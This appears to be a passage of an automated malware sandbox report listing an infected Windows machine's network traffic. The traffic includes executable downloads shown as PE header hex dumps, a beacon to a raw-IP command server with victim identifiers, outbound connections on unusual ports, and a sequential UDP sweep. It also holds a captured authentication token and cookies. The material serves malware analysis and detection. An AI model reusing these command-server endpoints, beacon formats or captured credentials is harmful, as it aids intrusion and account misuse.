40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:48:09 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:48:09 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:48:25 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:48:28 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061387448759736X-DeviceID: 0100748C09001CEAX-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Agent-DeviceId: 0100748C09001CEAX-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAamq5M9zPR5nuHfG3veMN5/jENMWNA4fbZEHrQpT8BxSz5%2BSh5s4f1VkbpEPJ9rOEPqabrlSbr3eu%2BoZ%2BB2QzG133x3OMu2w96LpDS72zKITv4CbqIeNkcmWB/nVghgXwvmWdxixlmtp6kSunXq0UxzmSBBrhPFVEwr%2B7mBUJhX5BUVIhqC%2B/divBqd1yet423TssuRskex24LtlkR6K5yP46R4zY881kAl/bUeEXcX7f5ULouRbplsaB3Dq1106wr4WW0K9M0VClTT34J86Y3c4PD0df7CmcP8WgB8qmWS1O2hKAoBamMRHZrSlmrH7NLzQDNCD1dIERCgVe2ufG5UDZgAACKOSvVfSgvd%2BqAGDhQ99hvMd5BU4o1M9GfaTzGHI6kqy4kOCqlaLU5wwi4ftfXIfqdARi2nWjggxLkcbJrJKl/g6hsdBRJyB9Hrdvn%2BU63FMHfZPLGZuGzPc9FN2qZC26frSLvI60cKLfeUt2SU6SQu%2BhuqdeyO/ThXuNgcfzrj3WejpOiRFHFeJ%2BeGrTapCDATYQ015PS188H8jEgFi9YsBp7gjZSPEg4CaGzlxgSACxhv6xhgATPyAkNWgcdSn90JBWajvPogFLs0GL1ugBmGAglEvFBeu7kxJjhrk7Lvl1EIB2pr4TNxLX5YwNxi1faaPg6yB5CD5mhOgnCGmf9RYdN6YATZQB45gzbl55n2FdvF0JDFgmwOXUAiOnR%2BX7JIMaeE6etzOS2YrO7c8K2Vp/gyZ6s/x6w6hs6lFOJPLHxwwE6DPsskFwiEF5Ma3p%2Bp9r31XNsuQDims7OK6dWJYMo6ej2eVHZSbid%2B3skvim3vN0GOipf4OGHIJCdZeovRtAtKl0g2uPL%2B5lkr4%2BXyDrYl6yPiq8LJ6V16ftmQdSLdXGC2YgiUjjswpD8ppqZmI1gE%3D%26p%3DX-BM-CBT: 1660690402X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: 27851B8F478B4558A23A9FEEA1D2C283X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 65252Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=54AD14FB4D1E4A6C815A867991009454; _SS=CPID=1664487862703&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CA49BB2BEB184018891765A9BD1D863D&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=84D464251C6428FCBF66122FFFFFFFFF; MUIDB=54AD14FB4D1E4A6C815A867991009454
          Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
          Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4682Host: login.live.com
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ruCookie: _yasc=WOxcuHWRth/MOesDrBOKQ05cqblg3Pr6HOsR8h6u0sZy4aMO; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ru
          Source: global trafficHTTP traffic detected: GET /sw/l.php?aff_id=1&wm_id=46&u=c8a78e4e-2f23-4533-80a0-a72fb7908116&log_id=16&os=6.2.9200.256.1.9. HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 78.159.97.210Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficTCP traffic: 192.168.2.6:49829 -> 13.107.42.16:139
          Source: global trafficTCP traffic: 192.168.2.6:49830 -> 37.187.79.168:139
          Source: global trafficTCP traffic: 192.168.2.6:49831 -> 13.107.5.88:139
          Source: global trafficTCP traffic: 192.168.2.6:49832 -> 185.199.108.133:139
          Source: global trafficTCP traffic: 192.168.2.6:49833 -> 140.82.121.3:139
          Source: global trafficTCP traffic: 192.168.2.6:49834 -> 76.73.17.194:9090
          Source: global trafficTCP traffic: 192.168.2.6:49838 -> 200.87.164.69:9999
          Source: global trafficTCP traffic: 192.168.2.6:49854 -> 128.31.0.39:9101
          Source: global trafficTCP traffic: 192.168.2.6:49857 -> 200.119.204.12:9999
          Source: global trafficTCP traffic: 192.168.2.6:49874 -> 190.186.45.170:9999
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.0:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.1:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.2:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.3:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.4:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.5:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.6:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.7:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.8:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.9:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.10:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.11:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.12:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.13:6893
